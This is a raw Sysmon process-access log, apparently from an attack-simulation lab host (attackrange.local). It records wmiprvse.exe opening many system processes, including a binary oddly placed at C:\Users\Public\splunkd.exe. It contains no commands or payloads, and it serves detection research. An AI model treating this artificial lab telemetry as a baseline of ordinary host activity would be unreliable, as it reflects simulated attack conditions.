15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.304{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.288{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022240Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 